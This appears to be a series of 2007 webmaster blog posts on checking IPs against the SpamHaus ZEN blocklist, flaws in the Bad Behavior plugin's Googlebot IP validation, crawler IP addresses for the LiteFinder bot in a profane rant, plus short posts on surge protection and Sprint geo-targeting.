Funny, if this were anti-virus software people wouldn't just pick any old thing, they would want comprehensive coverage, so why can't we get comprehensive coverage in block lists?

What is desperately needed is some mechanism to pool all the results together into one common service, a Block List Babelfish, where a single access can get the combined collective intelligence on whether the IP is good or bad so that everyone can easily benefit.

If anyone knows of a good BL aggregator let me know, OK?

Saturday, December 08, 2007

Validate Link Integrity Using DNSBL's like SpamHaus ZEN

People tend to just think that lists from sites like SpamHaus are only good for blocking spam from coming into your servers but that's just the tip of the iceberg if you're open to some creative thinking.

Since Google penalizes sites that link out to bad neighborhoods one potential use for SpamHaus ZEN is to help automatically identify bad sites and remove them. For people that run directories or have massive amounts of outbound links this means you can protect your visitors, as well as your reputation in Google and other places, via zen.spamhaus.org and eliminate links to IPs associated with spammers, 3rd party exploits, proxies, worms and trojans!

How's that for a kick ass way to clean up your site?

Keep in mind that on a shared server that a single IP address may represent multiple domains on a server. That means any domain on a server either spamming or otherwise compromised will impact all domains associated with that IP so many people may be effected that don't know there's a problem. However, since that server can be a hazard to the general population at large, it's best to err on the side of caution and suspend your association with all sites on that server until the problem is resolved.

Since most sites don't even know that they've been infected I merely quarantine those links until they are no longer being reported as hostile and then enable them again after they have been confirmed to be clean.

Not that everything will be listed in SpamHaus ZEN as much of the malicious activity I see isn't in their index, but it's a good reference for known bad sites.

Here's an example of how to check an IP address in SpamHaus using a spammers IP currently in the DNSBL.

Take the IP address 64.151.120.13 and reverse it to 13.120.151.64 and then combine the IP address to zen.spamhaus.org like this: 13.120.151.64.zen.spamhaus.org.

Using any DNS checking tool, query the DNSBL for the existence of 13.120.151.64.zen.spamhaus.org.

The IP is currently in the DNSBL you'll get a result like this:

host 13.120.151.64.zen.spamhaus.org
13.120.151.64.zen.spamhaus.org has address 127.0.0.2
If the IP address is not in the DNSBL you'll get a response like this:
host 13.120.151.123.zen.spamhaus.org
Host 13.120.151.123.zen.spamhaus.org not found: 3(NXDOMAIN)
The result codes from SpamHaus are as follows:
127.0.0.2 - SpamHaus Block List (SBL)
127.0.0.4-8 - Exploits Block List (XBL)
127.0.0.10-11 - Policy Block List (PBL)
The last list, the PBL, is probably something I wouldn't auto-block with a link checker or any other use (except anti-spam) unless I reviewed what it was blocking first so those errors, if they ever come up, are only set as "warnings" in my current implementation.

Thursday, December 06, 2007

Bad Behavior Needs Behavior Modification

WebGeek recently reported on Bad Behavior Behaving Badly where he got locked out of all his own blogs and was listed as an enemy of the state and put on the FBI's 10 most wanted geek list and all sorts of things.

OK, I'm exaggerating but read his post and it's close enough.

Anyway, there was something he mentioned about being concerned with:

"If left unattended in this state for a long time, a site could lose valuable search engine rankings, after the spiders of the Big 3 (Google, Yahoo, and MSN) find that they are locked out repeatedly with 403 errors."
Since he mentioned it, I've looked over the source code for Bad Behavior before and how they validate robots isn't something I'd put on my website because it relies solely on IP ranges alone and they are incomplete based on raw information I've collected from the crawlers themselves.

The search engines have clearly stated that they may expand into new IP ranges at any time without notice and the only official way to validate their main crawlers is with full round trip DNS checking to validate Googlebot for instance with IP ranges as a backup just in case they make a mistake.

So this code could easily be obsolete at any time:
if( stripos($ua, "Googlebot") !== FALSE || stripos($ua, "Mediapartners-Google") !== FALSE) {
require_once(BB2_CORE . "/google.inc.php");
}

// Analyze user agents claiming to be Googlebot
function bb2_google($package)
{
if (match_cidr($package['ip'], "66.249.64.0/19") === FALSE && match_cidr($package['ip'], "64.233.160.0/19") === FALSE) {
return "f1182195";
}
return false;
}
Even more importantly, I've tracked Google crawlers in the following IP ranges which is 2 more IP ranges than Bad Behavior has in their code!
64.233.160.0 - 64.233.191.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.239.255
216.239.32.0 - 216.239.63.255
The same criticism exists for validating the other bots in that Bad Behavior needs to have a little more robustness in the validation code so that it isn't accidentally blocking valid robots from indexing web pages. Unless I'm missing something I don't even see where Yahoo crawlers are specifically validated (I'm tracking 11 IP ranges for Yahoo) and MSNBOT was missing the 131.107.0.0/16 CIDR range, etc..

As it stands, the code doesn't have all the IP ranges that I've seen used for any of the major search engines so there is some risk, albeit not a big risk, that some legitimate search engine traffic is being bounced.

Not only that, but the MSIE validation is full of holes and most of the stealth crawlers I block will zip right through Bad Behavior and scrape the blog.

I think WebGeek is right, I would disable the add-in until those issues are resolved.

LiteFinder REALLY Go Fuck Yourself Now

In my opinion this whole LiteFinder Network Crawler is completely bogus.

Yesterday I commented on their crawler, which now just appears to be a ruse to lure people to their web site which is nothing but a big front for affiliate links.

Go to the LiteFinder home page and take a look at the main topics: Adult: Penis Enlargement, Online Gambling or the popular searches for "Phentermine" or "Breast Enlargement Pill".

Riiiiight.

This site is so spammy it would make Sanford Wallace blush.

The so-called search feature doesn't search shit, it just spits up a bunch of bullshit links.

Here's the results for a query on PLUMBING:

Shop
Browse and compare a great selection of .
www.somesite.com

Save up to 95% - diamond jewelry, engagement rings, designer watches, and much more. Live auctions starting at one dollar
somedomain.com

Gold, and Silver Jewelry
Great selection of jewelry including Rings, Necklaces, Bracelets, Pendants, Earrings, Body Jewelry, and Spazio watches.
somejewelry.com

Bored? Check Out the Sumo!
Viral video mayhem. Games Galore. Sucker free music. Bangin' Hotties. Animation for your fascination. Go to the Sumo, live large and never be disappointed by a weak video website again.
www.somesite.com

Etc. you get the idea...

What purpose is a crawler that doesn't feed a search engine?

You've got it, it's a lure, we've been had.

This LiteFinder Network Crawler thing just needs to be blocked, that's all there is to it.

Wednesday, December 05, 2007

LiteFinder Network Crawler Go Fuck Yourself

I don't get too riled up until I read some self-serving pompous bullshit like this that just makes the hair stand up on the back of my neck:

Can I learn the IP addresses, which LiteFinder Network Crawler comes from?
Unfortunately, You can't since it is against the rules of our company.
The user agent for this mess is:
"Mozilla/5.0 (compatible; LiteFinder/1.0; +http://www.litefinder.net/about.html)"
Since they don't feel like sharing the IP addresses, let me do the honors since it's not against MY company policy:
208.101.44.3 -> mybluewine.net.
209.160.65.42 -> hopone.net.
209.62.109.178 -> ev1s-209-62-109-178.ev1servers.net.
216.40.220.34 -> ev1s-216-40-220-34.ev1servers.net.
216.40.222.50 -> ev1s-216-40-222-50.ev1servers.net.
216.40.222.66 -> ev1s-216-40-222-66.ev1servers.net.
216.40.222.82 -> ev1s-216-40-222-82.ev1servers.net.
216.40.222.98 -> ev1s-216-40-222-98.ev1servers.net.
67.19.114.226 -> w103.networkharmony.com.
67.19.250.26 -> 1a.fa.1343.static.theplanet.com.
70.85.113.242 -> f2.71.5546.static.theplanet.com.
74.53.243.226 -> e2.f3.354a.static.theplanet.com.
74.53.243.242 -> f2.f3.354a.static.theplanet.com.
74.53.244.18 -> 12.f4.354a.static.theplanet.com.
74.53.249.34 -> 22.f9.354a.static.theplanet.com.
74.86.209.74 -> templatestill.com.
74.86.249.98 -> westhoste.net.
75.125.18.178 -> ev1s-75-125-18-178.ev1servers.net.
75.125.47.162 -> ev1s-75-125-47-162.ev1servers.net.
75.125.52.146 -> ev1s-75-125-52-146.ev1servers.net.
84.19.176.208 -> ns.km22118.keymachine.de.
87.118.118.111 -> ns.km31417.keymachine.de.
87.118.98.57 -> ns.km22427.keymachine.de.
87.118.98.62 -> ns.km22426.keymachine.de.

There you go, all the IPs I've seen them use and they can shove the rules of their company where the sun doesn't shine.

Surge Protection - Get it before it's TOO LATE!

I know many of you think surge protection is a bunch of hype but the father of a good friend just found out a few days ago that surge protection is a must have. Lightning apparently zapped their house and took out every single appliance, TVs, radios, computers and a nice big Wurlitzer organ all in one shot totaling over $20K in damages.

That was just enough to make me get off my ass and double check that all of our most expensive gear, like my computer, printers, big screen TV, DVRs, etc. were all plugged into the proper place on the UPS/Surge protector since the rainy season is starting in California.

For those of you that still have doubts about surge protection, and the odds that lightning will never hit your house, let me tell you about an old buddy of mine from Kansas City. He had a computer that got hit by lightning on the power line, fried the box. He went out and got a new computer and a surge protector for the electrical line. Then about a year later lightning hit the phone line and blew his computer apart when it came in via the modem. Again, he replaced the computer and this time put a surge protector on his phone line as well. Unfortunately, God didn't want him to have a computer and the 3rd time lightning shot in through the window and blew the computer off his desk. Last time I checked they don't make surge protectors for windows.

Anyway, if you don't have a surge protector for your electrical, phone and cable it's time to install one and move the computer away from the window so lightning can't easily blast it off your desk just to show you who's boss.

GEO Targeting Issues with Sprint Wireless Broadband

Testing my new Sprint Wireless Broadband turned up something that I didn't quite expect in regards to Geo targeting because the IP addresses used all are attributed to Southern California and I'm in Northern California.

I understand that privacy is a concern and you don't want people to know exactly where you are but being off by 600 miles is a bit much as nothing works right that tries to Geo target and some things can become down right annoying, such as AdSense showing you ads for local shit in Irvine California.

Nothing show stopping, just annoying.